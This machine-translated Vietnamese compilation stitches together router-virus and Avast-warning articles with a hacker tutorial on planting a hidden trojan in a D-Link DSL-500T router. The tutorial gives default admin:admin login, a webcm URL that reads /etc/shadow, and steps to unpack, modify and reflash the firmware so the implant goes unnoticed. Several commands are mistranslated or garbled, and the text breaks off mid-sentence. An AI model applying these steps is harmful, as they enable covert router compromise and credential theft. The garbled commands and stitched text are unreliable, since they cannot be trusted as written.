Avast viết rằng bộ định tuyến dễ bị tấn công, bị nhiễm virus và được định cấu hình không chính xác. Virus trong bộ định tuyến - DNS độc hại

Điều này có vẻ lạ đối với bạn, nhưng có những loại vi-rút lây nhiễm không phải máy tính, máy tính xách tay hay thiết bị di động mà là bộ định tuyến.

Tại sao làm điều này? Sau đó, mặc dù bộ định tuyến của bạn không lưu trữ bất kỳ thông tin có giá trị nào, nhưng quyền truy cập vào thiết bị này sẽ cho phép bạn thay đổi cài đặt máy chủ DNS. Ngược lại, điều này sẽ cho phép những kẻ lừa đảo chuyển tiếp một số yêu cầu của bạn đến các trang web giả mạo, nơi bạn sẽ nhập thông tin nhạy cảm hữu ích cho những kẻ lừa đảo. Nhiều mẫu bộ định tuyến dễ bị lây nhiễm, việc đưa ra một danh sách là vô nghĩa vì nó có thể được cập nhật liên tục. Vì sự an toàn của bạn, tôi khuyên bạn nên đưa ra các khuyến nghị sẽ cho phép bạn tránh bị nhiễm trùng.

Virus hoạt động như thế nào?

Máy tính của bạn bị nhiễm vi-rút có tên Win32.Sector. Đến lượt nó, nó tải xuống Trojan.Rbrute từ một máy chủ đặc biệt, máy chủ này tìm kiếm các bộ định tuyến trên mạng và cố gắng giành quyền truy cập vào cấu hình. Sau khi có được quyền truy cập, anh ta thay đổi địa chỉ DNS hiện tại đã đăng ký trong bộ định tuyến thành địa chỉ DNS của mình. Sau đó, tất cả các thiết bị được kết nối với bộ định tuyến sẽ xuất hiện trên trang mà Win32.Sector được tải xuống.

  • Biểu tượng “Internet” sáng nhưng bạn không thể truy cập hầu hết các trang web hoặc tải sai trang web mà bạn muốn mở
  • Những trang web lạ tự động mở
  • Máy tính không thể lấy địa chỉ IP từ mạng của bạn (nó được gán một địa chỉ như 169.254.xxx.xxx của mạng con Microsoft)

Làm cách nào để loại bỏ vi-rút Trojan.Rbrute khỏi bộ định tuyến?

  1. Trước tiên, bạn cần đặt lại bộ định tuyến của mình về cài đặt gốc. Để thực hiện việc này, hãy nhấn nút “Đặt lại” ở mặt sau của bộ định tuyến và đợi 10 giây cho đến khi bộ định tuyến nhấp nháy tất cả các đèn báo và khởi động lại.

2. Đi tới bảng quản trị của bộ định tuyến và thay đổi mật khẩu tiêu chuẩn để truy cập vào bảng quản trị của riêng bạn, tốt nhất là mật khẩu phức tạp hơn.

3. Chúng tôi định cấu hình lại bộ định tuyến, kiểm tra xem Internet có hoạt động tốt không.

4. Từ trang web chính thức của nhà sản xuất bộ định tuyến, hãy tải xuống chương trình cơ sở mới nhất cho kiểu máy của bạn và flash nó. Rất có thể, trong phiên bản phần sụn mới nhất, các lỗ hổng mà kẻ tấn công có được quyền truy cập vào cài đặt bộ định tuyến đã bị đóng.

5. Sau đó, chúng tôi kiểm tra máy tính để tìm phần mềm độc hại để loại trừ khả năng WinSector hoặc Trojan.Rbrute vẫn còn trên ổ cứng máy tính. Bạn có thể làm điều này bằng cách sử dụng các công cụ miễn phí từ bài viết.

Tôi hy vọng bài viết của tôi đã giúp bạn =)

Cho đến gần đây, tôi thậm chí còn không biết rằng bộ định tuyến Avast khiến người dùng sợ hãi bằng những cảnh báo "đáng sợ" liên quan đến bộ định tuyến của họ. Hóa ra, phần mềm chống vi-rút Avast quét các bộ định tuyến Wi-Fi. Nó cho kết quả rằng bộ định tuyến không được định cấu hình chính xác, thiết bị dễ bị tấn công hoặc nói chung là bộ định tuyến bị nhiễm và lây nhiễm, đồng thời những kẻ tấn công đã chặn các địa chỉ DNS và chuyển hướng thành công bạn đến các trang web độc hại, đánh cắp thông tin thẻ tín dụng và nói chung mọi thứ đều rất tệ. Tất nhiên, tất cả những cảnh báo này đều được tô điểm bằng màu đỏ nguy hiểm và những hướng dẫn khó hiểu mà ngay cả một chuyên gia giỏi không có bia cũng sẽ không hiểu được. Tôi thậm chí không nói về người dùng bình thường. Đây là những vấn đề được tìm thấy trên bộ định tuyến D-Link DIR-615:

Thiết bị dễ bị tấn công:

Tất nhiên, giải pháp là cập nhật chương trình cơ sở của bộ định tuyến. Bởi vì còn gì nữa 🙂 Avast cũng có thể hiển thị thông báo rằng bộ định tuyến của bạn được bảo vệ bằng mật khẩu yếu hoặc bộ định tuyến không được bảo vệ khỏi bị hack.

Trong một số trường hợp, bạn có thể thấy thông báo rằng bộ định tuyến của bạn bị nhiễm virus và các kết nối được chuyển hướng đến máy chủ độc hại. Phần mềm chống vi-rút Avast giải thích điều này bằng cách nói rằng bộ định tuyến của bạn đã bị tấn công và địa chỉ DNS của nó đã bị thay đổi thành địa chỉ độc hại. Và có hướng dẫn giải quyết vấn đề này cho các bộ định tuyến khác nhau: ASUS, TP-Link, ZyXEL, D-Link, Huawei, Linksys/Cisco, NETGEAR, Sagem/Sagemco.

Tóm lại, tất cả những khuyến nghị này đều nhằm mục đích kiểm tra địa chỉ DNS và các dịch vụ liên quan đến DNS. Thông qua đó kẻ tấn công có thể thay đổi DNS trên bộ định tuyến của bạn và chuyển hướng bạn đến các trang web độc hại của chúng. Có hướng dẫn chi tiết về cách kiểm tra mọi thứ trên bộ định tuyến của các nhà sản xuất khác nhau.

Làm cách nào để phản hồi cảnh báo từ Avast về lỗ hổng bộ định tuyến?

Tôi nghĩ câu hỏi này khiến mọi người quan tâm. Đặc biệt nếu bạn đã đến trang này. Nếu bạn đang thắc mắc tôi sẽ phản ứng thế nào trước những cảnh báo như vậy từ phần mềm chống vi-rút, thì câu trả lời rất đơn giản - hoàn toàn không. Tôi chắc chắn rằng Avast đã tìm thấy các lỗ hổng trong bộ định tuyến của tôi mà qua đó tôi có thể bị hack. Tôi chỉ có Dr.Web. Anh ấy không thực hiện những cuộc kiểm tra như vậy.

Có thể tôi sai, nhưng không có phần mềm chống vi-rút nào ngoài Avast kiểm tra các bộ định tuyến Wi-Fi mà bạn kết nối để tìm các loại lỗ hổng khác nhau. Và tính năng này có tên là Home Network Security, đã xuất hiện vào năm 2015. Ở phiên bản Avast 2015.

Avast quét bộ định tuyến của bạn để tìm các vấn đề bảo mật thiết bị. Mặc dù tôi không hoàn toàn hiểu cách anh ấy làm điều đó. Ví dụ: làm cách nào để kiểm tra cùng một mật khẩu để nhập cài đặt bộ định tuyến. Nó có đi theo người dùng hay là một phương pháp lựa chọn? Nếu bạn đoán được thì mật khẩu tệ 🙂 Được rồi, tôi không phải là lập trình viên.

Cá nhân tôi tin rằng tất cả những cảnh báo này không gì khác hơn là những khuyến nghị đơn giản để tăng cường tính bảo mật cho bộ định tuyến của bạn. Điều này không có nghĩa là ai đó đã hack bạn và đánh cắp dữ liệu của bạn. Những gì Avast cung cấp:

  • Đặt mật khẩu tốt và cập nhật chương trình cơ sở của bộ định tuyến. Họ nói nếu không bạn có thể bị hack. Được rồi, điều này đã rõ ràng rồi. Điều này không nhất thiết phải được báo hiệu là một loại lỗ hổng khủng khiếp nào đó. Mặc dù một lần nữa, tôi không hiểu làm thế nào phần mềm chống vi-rút xác định rằng phiên bản phần mềm bộ định tuyến đã lỗi thời. Đối với tôi, dường như điều này là không thể.
  • Bộ định tuyến không được bảo vệ khỏi các kết nối từ Internet. Rất có thể, cảnh báo này xuất hiện sau khi kiểm tra các cổng đang mở. Nhưng theo mặc định, chức năng “Truy cập từ WAN” bị tắt trên tất cả các bộ định tuyến. Tôi thực sự nghi ngờ rằng có ai đó sẽ hack bộ định tuyến của bạn qua Internet.
  • Chà, điều tồi tệ nhất là việc thay thế địa chỉ DNS. Nếu phát hiện bất kỳ vấn đề nào với DNS, Avast sẽ trực tiếp viết rằng “Bộ định tuyến của bạn bị nhiễm!” Nhưng trong 99% trường hợp thì không phải như vậy. Một lần nữa, hầu như bộ định tuyến luôn tự động nhận DNS từ nhà cung cấp. Và tất cả các chức năng và dịch vụ mà qua đó kẻ tấn công có thể giả mạo DNS bằng cách nào đó đều bị tắt theo mặc định. Đối với tôi, có vẻ như phần mềm chống vi-rút thường hiểu nhầm một số cài đặt của người dùng.

Một cái gì đó như thế này. Tất nhiên, bạn có thể không đồng ý với tôi. Đối với tôi, có vẻ như việc truy cập trực tiếp và lây nhiễm vào máy tính sẽ dễ dàng hơn nhiều so với thực hiện bằng bộ định tuyến. Nếu chúng ta đang nói về một cuộc tấn công qua Internet. Tôi rất vui khi thấy ý kiến ​​​​của bạn về vấn đề này trong phần bình luận.

Làm cách nào để bảo vệ bộ định tuyến của bạn và xóa cảnh báo khỏi Avast?

Chúng ta hãy thử tìm hiểu từng mục mà Avast có nhiều khả năng kiểm tra và đưa ra cảnh báo nhất.

  • Bộ định tuyến được bảo vệ bằng mật khẩu yếu. Không có mã hóa. Trong trường hợp đầu tiên, phần mềm chống vi-rút có mật khẩu mà bạn phải nhập khi vào cài đặt bộ định tuyến. Thông thường, mật khẩu mặc định là quản trị viên. Hoặc chưa được cài đặt gì cả. Và hóa ra tất cả những người được kết nối với mạng của bạn đều có thể vào cài đặt bộ định tuyến. Vì vậy, mật khẩu này cần phải được thay đổi. Tôi đã viết cách thực hiện việc này trong bài viết: . Đối với mật khẩu mạng Wi-Fi cũng phải mạnh và phải sử dụng loại mã hóa WPA2. Tôi luôn viết về điều này trong hướng dẫn thiết lập bộ định tuyến.
  • Bộ định tuyến dễ bị tấn công do phần mềm cũ.Điều này không hoàn toàn đúng. Tuy nhiên, nếu có chương trình cơ sở mới cho mẫu bộ định tuyến của bạn thì bạn nên cập nhật nó. Không chỉ để cải thiện tính bảo mật mà còn giúp thiết bị hoạt động ổn định hơn và các chức năng mới. Chúng tôi có hướng dẫn trên trang web của mình để cập nhật phần mềm cho bộ định tuyến từ các nhà sản xuất khác nhau. Bạn có thể tìm thấy nó thông qua tìm kiếm hoặc hỏi trong phần bình luận. Đây là dành cho .
  • Cài đặt DNS đã được thay đổi. Bộ định tuyến đã bị hack. Thành thật mà nói, tôi chưa bao giờ gặp những trường hợp như vậy trước đây. Như tôi đã viết ở trên, tất cả các dịch vụ có thể xảy ra điều này đều bị tắt theo mặc định. Thông thường, bộ định tuyến sẽ tự động nhận DNS từ nhà cung cấp. Điều duy nhất tôi có thể khuyên là không nên nhập thủ công các địa chỉ DNS mà bạn không chắc chắn. Và nếu bạn chỉ định địa chỉ theo cách thủ công, tốt hơn là chỉ sử dụng DNS từ Google, đó là: . Điều này cũng được khuyến nghị trong các đề xuất của Avast, có thể xem trên trang web chính thức:. Có hướng dẫn chi tiết để giải quyết vấn đề DNS cho hầu hết các bộ định tuyến.

Đó là tất cả. Tôi hy vọng tôi có thể giải thích ít nhất một chút những cảnh báo này trong phần mềm chống vi-rút Avast. Đặt câu hỏi trong phần bình luận và đừng quên chia sẻ thông tin hữu ích về chủ đề này. Lời chúc tốt nhất!

Trước tình hình ngày càng có nhiều trường hợp thay thế DNS bằng phần mềm độc hại trên thiết bị của người dùng Internet, câu hỏi về tính bảo mật của bộ định tuyến Wi-Fi đã đặt ra. Cách kiểm tra bộ định tuyến của bạn để tìm virus? Cách loại bỏ vi-rút khỏi bộ định tuyến? Câu hỏi này phức tạp và đơn giản cùng một lúc. Có một giải pháp!


Bản thân vi-rút không thể tự ghi lại trên hầu hết các bộ định tuyến hiện đại do dung lượng bộ nhớ của bộ định tuyến quá nhỏ, nhưng nó có thể biến bộ định tuyến tham gia vào mạng botnet. Theo quy định, đây là một botnet để tấn công các máy chủ khác nhau hoặc để chuyển hướng và phân tích luồng thông tin khiến bạn truy cập Internet.

Mật khẩu và thư từ cá nhân của bạn có thể rơi vào tay kẻ tấn công!

Điều này cần phải được khắc phục càng nhanh càng tốt.

  • Đặt lại bộ định tuyến
  • Phần mềm bộ định tuyến
  • Đặt lại

Đặt lại bộ định tuyến

Bạn có thể đặt lại cài đặt bộ định tuyến bằng cách nhấn nút đặt lại. Thông thường nút này nằm ở mặt sau của bộ định tuyến, nơi có các cổng LAN. Thông thường nút bấm được làm lõm vào một lỗ để tránh vô tình ấn vào nên bạn phải dùng tăm. Cái này sẽ xóa cài đặt bộ định tuyến do vi-rút thay đổi và cài đặt cài đặt gốc vào vị trí của chúng. Tôi phải cảnh báo bạn rằng nếu bạn không biết cách định cấu hình bộ định tuyến thì cài lại cài đặt của nó dành cho bạn không đáng!

Phần mềm bộ định tuyến

Đôi khi virus “ngập lụt” phần sụn đã sửa đổiđến bộ định tuyến. Để loại bỏ phần mềm vi-rút khỏi bộ định tuyến, bạn có thể flash lại bộ định tuyến.

Kết nối máy tính với bộ định tuyến bằng cáp LAN. Cáp LAN được bao gồm trong bất kỳ bộ định tuyến nào. Hoặc qua Wi-Fi nếu không thể kết nối cáp. Tốt hơn là kết nối bằng cáp! Kết nối không dây được coi là không ổn định và không phù hợp để cập nhật chương trình cơ sở của bộ định tuyến.

Sau khi chúng ta kết nối với bộ định tuyến, hãy mở trình duyệt (Chrome, Opera, Mozilla, IE) và nhập địa chỉ của bộ định tuyến ASUS vào thanh địa chỉ, đối với Asus là 192.168.1.1, trên trang mở ra, bạn sẽ cần phải nhập thông tin đăng nhập và mật khẩu của bạn để vào cài đặt bộ định tuyến. Đăng nhập: quản trị viên, Mật khẩu: quản trị viên. Nếu thông tin đăng nhập và mật khẩu không khớp, hãy hỏi người thiết lập bộ định tuyến cho bạn, có lẽ anh ta đã thay đổi chúng.

Tải xuống chương trình cơ sở từ trang web của nhà sản xuất và chọn chương trình cơ sở trên đĩa bằng trang cài đặt bộ định tuyến. Đối với phần lớn các bộ định tuyến, các bước thực hiện chương trình cơ sở đều giống nhau.

Xin chào độc giả của tôi! Trong bài viết này tôi sẽ nói về các bộ định tuyến ADSL tuyệt vời
– những mảnh sắt không thể thiếu trong mạng lưới gia đình và công nghiệp. Tôi sẽ kể cho bạn nghe về câu hỏi
khai thác các tuyến này vì mục đích có lợi cho chúng ta - khâu vá một cách tàn bạo
Trojan bên trong bộ định tuyến. Và theo cách mà không ai có thể nhận ra
một quản trị viên thông minh, không phải một người dùng thông minh.

Mong muốn hoặc yêu cầu IQ

Khi tôi viết bài này, tôi cho rằng chỉ cần đọc là đủ
người dùng nâng cao đã cài đặt GNU\Linux, người cũng có một số kỹ năng
làm việc và lập trình trong hệ điều hành này. Tuy nhiên, có vẻ như
có thể lặp lại các bước của tôi trên Windows (ví dụ: sử dụng Cygwin), nhưng
điều này sẽ không được mô tả. Để đạt được khoái cảm tối đa bạn cũng cần
kỹ năng hàn sắt (điều này là tùy chọn).

Và tất cả bắt đầu...

Bằng cách nào đó tôi đã bị phân tâm. Vì vậy, tất cả bắt đầu khi một ngày kia người này cúp máy
phần cứng, hay nói đúng hơn là nó đã cắt đứt kết nối Internet một cách nguy hiểm và không
Tôi muốn khôi phục nó. Đồng thời, cô ấy ở rất xa, có thể tiếp cận được
Tôi không đến đó để gặp cô ấy (tuy nhiên, bằng cách nào đó tôi đã nói dối - tôi quá lười để đứng dậy khỏi ghế sofa).
khởi động lại bộ định tuyến :)), giao diện Web không phản hồi, nhưng tôi nhớ rằng trên
Cái này phải có telnet hoặc ssh. Đăng nhập vào khu vực quản trị
chưa từng thử trước đây và đã liều lĩnh không thay đổi mật khẩu tài khoản của mình (như
Hóa ra sau đó rất vô ích, vì mặc định là “admin:admin”). Vì vậy tôi
đã thử SSH và nó đã hoạt động!

$ssh [email được bảo vệ]
$Mật khẩu:

Giống như một tia sét từ màu xanh! Hộp bận rộn! Tôi chưa bao giờ nghĩ đến việc dưới quyền của ai
Hóa ra bộ định tuyến này được điều khiển – GNU/Linux! Tôi cảm thấy kinh hãi
Tôi tự hỏi mọi thứ ở đây diễn ra như thế nào, và về mặt tinh thần, nhờ sự lười biếng và cơ hội, tôi
đã đi vào nghiên cứu.

Thu thập thông tin

Vậy tôi đã bắt đầu từ đâu? Tất nhiên, từ danh sách các lệnh có sẵn:

#busybox
...
Các chức năng được xác định hiện tại:
[, tro, busybox, cat, chgrp, chmod, chown, cp, date, dd, df, echo, false, free,
grep, tên máy chủ, id, ifconfig, init, insmod, kill, ln, đăng nhập, ls, lsmod, mkdir,
modprobe, mount, mv, passwd, ping, ps, pwd, khởi động lại, rm, rmmod, tuyến đường, sh, ngủ,
đồng bộ hóa, tar, kiểm tra, tftp, touch, true, tty, umount, wget, whoami, vâng

Bộ sản phẩm khá hợp lý, đủ dùng cho việc nghiên cứu và triển khai ý tưởng thông thường.
Tiếp theo, sự quan tâm đến phiên bản kernel được đánh thức:

# cat /proc/phiên bản
Phiên bản Linux 2.4.17_mvl21-malta-mips_fp_le (root@xy) (gcc phiên bản 2.95.3
20010315 (phát hành/MontaVista)) #1 Thứ Năm ngày 28 tháng 12 05:45:00 CST 2006

Để tham khảo: MontaVista là một bản phân phối nhằm mục đích nhúng
hệ thống. Phần lớn các nhà sản xuất thiết bị mạng cung cấp
ưu tiên cho hệ thống này. Nó cũng có thể được tìm thấy trên các thiết bị khác, ví dụ như trong
sách điện tử hoặc điện thoại di động.

# cat /etc/versions
KHÁCH HÀNG=DLinkRU
MÔ HÌNH=DSL-500T
PHIÊN BẢN=V3.02B01T01.RU.20061228
HTML_LANG=EN.302
BAN=AR7VW
VERSION_ID=
CPUARCH_NAME=AR7
MODEL_ID=
FSSTAMP=20061228055253

# cat /proc/cpuinfo
bộ xử lý
: 0
mô hình cpu
: MIPS 4KEc V4.8
BogoMIPS
: 149.91
hướng dẫn chờ: không
hẹn giờ micro giây: có
vectơ ngắt bổ sung: có
quan điểm phần cứng: có
Ngoại lệ VCED: không có sẵn
Ngoại lệ VCEI: không có sẵn

AR7 là chip lõi kép được phát triển bởi Texas Instruments. Anh ta
chứa bộ định tuyến ADSL chính thức trên một chip duy nhất hỗ trợ các tiêu chuẩn ADSL1,
ADSL2,ADSL2+. Dựa trên bộ xử lý RISC hiệu suất cao MIPS 4KEc, với
tần số xung nhịp 175 hoặc 233 (tùy công nghệ sản xuất: 18 micron
hoặc 13µm). Con chip này chứa 2 giao diện UART trên bo mạch, một trong số đó (UART_A)
được sử dụng để xuất thông tin gỡ lỗi, cũng như giao diện EJTAG phục vụ
để gỡ lỗi (chương trình cơ sở) Bộ nhớ Flash. Việc sử dụng các giao diện này sẽ được thảo luận
được mô tả dưới đây.

Cuối cùng, tôi nhìn vào thông tin bộ nhớ:

# mèo /proc/mount
/dev/mtdblock/0/squashfs ro 0 0
không có /dev devfs rw 0 0
proc /proc proc rw 0 0
ramfs /var ramfs rw 0 0

# con mèo /proc/mtd
dev: kích thước xóa tên
mtd0: 0034f000 00010000 "mtd0"
mtd1: 00090f70 00010000 "mtd1"
mtd2: 00010000 00002000 "mtd2"
mtd3: 00010000 00010000 "mtd3"
mtd4: 003e0000 00010000 "mtd4"

Đương nhiên, không quên địa chỉ khối:

# cat /proc/ticfg/env | grep mtd
mtd0 0x900a1000,0x903f0000
mtd1 0x90010090,0x900a1000
mtd2 0x90000000,0x90010000
mtd3 0x903f0000,0x90400000
mtd4 0x90010000,0x903f0000

Từ phần trên, bộ nhớ Flash (/dev/mtdblock) có 5 khối:

mtd0– hình ảnh của hệ thống tập tin SquashFs. Đây là một tập tin đặc biệt
một hệ thống được nén và chỉ đọc. Vì
thuật toán nén gzip được sử dụng, nhưng trong trường hợp này - LZMA (tỷ lệ nén
cao hơn). Kích thước của khối này là 4 MB.

mtd1– khối này chứa lõi MontaVista được nén bằng thuật toán LZMA
điều kiện, kích thước khối 600 KB.

mtd2– Bootloader ADAM2, nạp kernel, cũng có
dịch vụ máy chủ FTP để phục hồi và flash. Sẽ có nhiều chi tiết hơn về nó
đã nêu thêm. Kích thước khối là 64 KB.

mtd3– phân chia giữa dữ liệu cấu hình và môi trường
(biến môi trường), bạn có thể xem trong /proc/ticfg/env.
Dữ liệu cấu hình nằm trong /etc/config.xml. Trung gian giữa các tập tin
hệ thống, khối cấu hình được đóng lại (giống như tất cả cm_*, control, o
chúng sau) chương trình cm_logic. Kích thước của khối này cũng là 64 KB.

mtd4– phần này chứa chữ ký phần sụn, hạt nhân và hình ảnh tệp
hệ thống. Khối này được sử dụng khi cập nhật chương trình cơ sở qua giao diện Web.
Ban đầu nó được lưu trữ trong khối này, sau đó tổng kiểm tra được kiểm tra
và nếu phù hợp, anh ấy sẽ đăng ký chỗ ở mới.

RAM (16 MB ở model này, nhưng ADAM2 ở model này
chỉ thấy 14 MB, được khắc phục bằng cách cập nhật), được gắn vào thư mục /var và
Bạn có thể dễ dàng sử dụng nó cho mục đích của chúng tôi:

# miễn phí
tổng số bộ đệm chia sẻ miễn phí đã sử dụng
Mem: 14276 10452 3824 0

Chúng ta đừng quên xem qua danh sách các quy trình. Trong số những điều thú vị đang ẩn nấp ở đây
daemon: thttpd - Máy chủ web; dproxy - yêu cầu DNS lưu vào bộ nhớ đệm của máy chủ proxy; ddnsd
- Trình nền DNS; pppd... là daemon thực tế thực hiện kết nối thông qua giao thức
PPP và trong các thông số chúng ta thấy thông tin tài khoản. Vì vậy, nếu bộ định tuyến không
giả vờ là một cái ống (đọc - không phải ở chế độ cầu nối), thì bạn có thể
dễ dàng có được tài khoản.

Các chương trình cm_* đã bị đóng và mã nguồn đã bao gồm
được biên soạn (các chương trình này cũng được phát triển bởi Texas Instruments, trên D-Link
Chẳng ích gì khi tranh cãi về việc không tuân thủ giấy phép).

cm_logic– một chương trình điều khiển logic của hệ thống, thông qua nó
đang tiến hành cấu hình; đồng bộ hóa /etc/config.xml với
phần nội dung tương ứng của /dev/ticfg (trỏ tới mtd3).

cm_cli– Giao diện dòng lệnh để quản lý và cấu hình
hệ thống. Ví dụ: cài đặt kết nối được thực hiện thông qua giao diện này.

cm_pc– khởi chạy và giám sát các quy trình, kết nối với các quy tắc
(ví dụ: chạy chương trình dưới dạng daemon; các quy tắc cũng bao gồm thông tin về
cổng mở) được mô tả trong /etc/progdefs.xml; tải ngay sau đó
hạt nhân.

webcm– Giao diện CGI, bị rò rỉ, ví dụ cho phép bạn xem /etc/shadow,
chỉ đơn giản bằng cách truy cập vào URL.

http://192.168.1.1/../../../etc/shadow

Tôi không nhận được gì cả, thttpd không đơn giản như vậy, nhưng nếu vậy:

http://192.168.1.1/cgi-bin/webcm?getpage=/etc/shadow

Cái khác. Điều này có thể được sử dụng để thu thập thông tin nếu không có quyền truy cập vào
ssh/telnet, nhưng có quyền truy cập vào giao diện Web.

firmwarecfg– được sử dụng để flash firmware thông qua giao diện Web. Ở lối vào
của chương trình này, một hình ảnh được truyền với yêu cầu POST từ giao diện Web và nó đã
chuyển hướng đến bộ nhớ Flash sau lần kiểm tra tổng kiểm tra hình ảnh đầu tiên.

Tại thời điểm này, việc thu thập thông tin chính đã hoàn tất, đã đến lúc chuyển sang bước quyết định
hành động.

Cài đặt công cụ phát triển và biên dịch chương trình cơ sở

Phần sụn cho bộ định tuyến D-Link (và tất cả các bộ định tuyến khác dựa trên GNU/Linux)
được phân phối theo giấy phép GPL, bạn có thể lấy chúng trên trang web chính thức
Máy chủ ftp. Trên thực tế, bạn có thể chọn bất kỳ phần mềm nào trong danh sách phần mềm được đề xuất,
chúng giống nhau (liên quan đến dòng T). Việc phân phối bao gồm mã nguồn của kernel, môi trường,
các công cụ và chuỗi công cụ cần thiết để phát triển/biên dịch các công cụ hiện có
các chương trình. Nó nên được giải nén vào thư mục gốc và thêm vào biến môi trường
Đường dẫn PATH đến thư mục bin của toolchain:

$ tar xvf tools.tgz
$ xuất PATH=$PATH:/opt/

Bây giờ, để biên dịch chương trình cơ sở của riêng bạn, hãy vào thư mục
với mã nguồn và chạy cùng loại mã này.

$ cd DSL/TYLinuxV3/src && make

Sẽ có rất nhiều câu hỏi được đặt ra về việc bật hỗ trợ thiết bị (tốt hơn
trả lời chúng một cách tích cực). Sau khi biên dịch xong, vào thư mục TYLinuxV3/images
Hình ảnh phần sụn sẽ được tạo. Bạn cũng có thể chạy tập lệnh có cùng tên với tập lệnh của bạn
mô hình từ thư mục /TYLinuxV3/src/scripts.

Một vài lời về việc truyền tập tin giữa bộ định tuyến và máy tính. Việc đầu tiên
phương pháp tôi đã sử dụng là khả năng truyền tệp qua giao thức SSH,
sử dụng chương trình scp cho việc này. Nhưng một thời gian sau tôi phát hiện ra rằng mc (Midnight
Commander) còn có khả năng kết nối thông qua SSH (Panel -> Shell Connection).
Ngoài ra, bạn có thể thiết lập máy chủ Web hoặc FTP tại nơi làm việc của mình. Sau này tôi
Tôi ưu tiên máy chủ Web vì nó hoạt động nhanh nhất. Tôi đã cài đặt nó
thttpd, nhỏ và nhanh, giống như trên bộ định tuyến. Chúng tôi khởi chạy nó ở nhà và tải nó xuống
router, sau khi vào thư mục /var (nó, như đã đề cập
trước đó, có sẵn để ghi lại).

$ thttpd -g -d ~/ForRouter -u user -p 8080
# cd /var
# quên http://192.168.1.2/file

Để tải xuống tệp từ bộ định tuyến, bạn cũng có thể nâng cao máy chủ Web:

# thttpd -g -d /var -u root -p 8080

Xin lưu ý rằng nếu bạn muốn tải xuống một tập tin thực thi từ bộ định tuyến, bạn nên
loại bỏ quyền khởi chạy. Khi tải xuống một số lượng lớn tệp từ bộ định tuyến
Tốt hơn nên sử dụng mc, trước tiên bạn sẽ không cần sao chép tệp vào/var và
xóa quyền, sau đó xóa các tệp này để giải phóng dung lượng. Nhìn chung, vấn đề
nếm thử, chọn bất kỳ tùy chọn nào thuận tiện cho bạn.

Tạo chương trình của riêng bạn

Tất nhiên, hãy bắt đầu với một chương trình cổ điển - HelloWorld. Một số cái đặc biệt
không có quy định. Nội dung của chương trình quen thuộc một cách đau đớn:

#bao gồm
#bao gồm

int chính(void)
{
printf("Mate.Feed.Kill.Repeat.");
trả về 0;
}

Biên dịch (đường dẫn đến chuỗi công cụ phải được chỉ định trong biến môi trường
CON ĐƯỜNG):

$ mips_fp_le-gcc hell.c -o địa ngục
$ mips_fp_le-strip - chết tiệt

# cd /var
# chmod +x chết tiệt
# ./địa ngục

Và... sẽ không có gì xảy ra, hoặc thông báo không tìm thấy đường dẫn sẽ xuất hiện. Nó là gì
trường hợp? Tôi đã nói về cm_pc - chương trình này ra mắt những chương trình khác trong
theo các quy tắc được mô tả trong /etc/progdefs.xml. Bây giờ đã đến lúc
sửa đổi và flash hình ảnh hệ thống tập tin.

Sửa đổi hệ thống tập tin

Để sửa đổi hệ thống tập tin, trước tiên bạn cần phải
giải nén. Như tôi đã đề cập, hệ thống tệp ở đây là SquashFs với bản vá LZMA.
Gói phát triển chương trình cơ sở chỉ bao gồm chương trình mksquashfs (để tạo
image), unsquashfs (để giải nén) bị thiếu. Nhưng không sao cả, mọi thứ đều có sẵn
trên trang web hệ thống tập tin, chúng tôi cần phiên bản đầu tiên. Bằng cách áp dụng bản vá LZMA và
Sau khi thu thập các tiện ích, chúng tôi đặt chúng ở một nơi thuận tiện. Đầu tiên chúng ta có được hình ảnh
hệ thống tập tin từ bộ định tuyến:

# cat /dev/mtdblock/0 > /var/fs.img

$ mkdir đã giải nén_fs
$ unsquashfs fs.img đã giải nén_fs

Bây giờ bạn có thể sửa đổi nó theo ý muốn và chúng tôi có thể gửi nó đến FuckTheWorld
/bin và thêm quy tắc để chạy trong /etc/progdefs.xml.

$ cp xin chào unpacked_fs/bin
$ vim unpacked_fs/etc/progdefs.xml

Và chúng tôi thêm phần này (giữa các thẻ ):

địa ngục
/bin/địa ngục

Lưu và đóng gói lại:

$ mksquashfs unpacked_fs my_fs.img -noappend

Xin lưu ý rằng hình ảnh hệ thống tập tin không được vượt quá
kích thước chấp nhận được. Nếu bạn cảm thấy muốn thử điều gì đó khẩn cấp nhưng lại không
phù hợp, hãy xóa bất cứ thứ gì “không cần thiết” khỏi hình ảnh như grep, whoami hoặc
sử dụng trình đóng gói tệp thực thi UPX. Bây giờ hãy tải nó xuống bộ định tuyến
hình ảnh và chuyển sang phần tiếp theo.

Ghi lại hình ảnh hệ thống tập tin

Phương pháp flash bộ định tuyến rất đơn giản; nó liên quan đến việc truy cập vào thiết bị
/dev/mtdblock/*. Vì vậy, hãy tải tập tin hình ảnh lên bộ định tuyến theo bất kỳ cách nào thuận tiện.
hệ thống và thực hiện hành động đơn giản này:

# cat my_fs.img > /dev/mtdblock/0 && khởi động lại

# cp my_fs.img /dev/mtdblock/0 && khởi động lại

Sau một thời gian, khi quá trình ghi hoàn tất, bộ định tuyến sẽ khởi động lại và
những thay đổi sẽ có hiệu lực. Hãy thử chạy ví dụ của chúng tôi:

# địa ngục
Mate.Feed.Kill.Repeat.

Phương pháp phục hồi khi có sự cố

Trước khi flash bộ định tuyến của bạn với những “thủ công” nghiêm túc hơn, bạn nên tìm hiểu cách
hành động trong những trường hợp quan trọng khi bộ định tuyến từ chối
trọng tải. Không có tình huống vô vọng. Máy chủ FTP ADAM2 ra tay giải cứu. Vì
Trước tiên, bạn nên khởi chạy ứng dụng khách FTP tới địa chỉ IP ADAM2, địa chỉ này bạn có thể theo dõi
trong /proc/ticfg/env (tham số my_ipaddress).

$ ftp 192.168.1.199
Máy chủ FTP 220 ADAM2 đã sẵn sàng.
530 Vui lòng đăng nhập bằng USER và PASS.

Để rõ ràng, bạn có thể bật chế độ gỡ lỗi, sau đó tất cả
thông tin và tất cả các phản hồi FTP:

Đăng nhập/mật khẩu – adam2/adam2. Quá trình nhấp nháy rất đơn giản. Để bắt đầu
chuyển phiên FTP sang chế độ nhị phân:

ftp> trích dẫn MEDIA FLSH

Ví dụ: bây giờ chúng tôi gửi hình ảnh của hệ thống tệp và cho biết vị trí
điểm đến:

ftp> đặt fs.img "fs.img mtd0"

Chúng tôi đợi kết thúc quá trình ghi, khởi động lại bộ định tuyến, thoát phiên:

ftp> trích dẫn KHỞI ĐỘNG LẠI
ftp>thoát

Tất cả! Như bạn có thể thấy, không có gì phức tạp cả, bây giờ nếu có sự cố xảy ra, bạn
bạn luôn có thể khắc phục tình hình.

Để dễ sử dụng, bạn nên cung cấp địa chỉ IP bình thường, kích hoạt
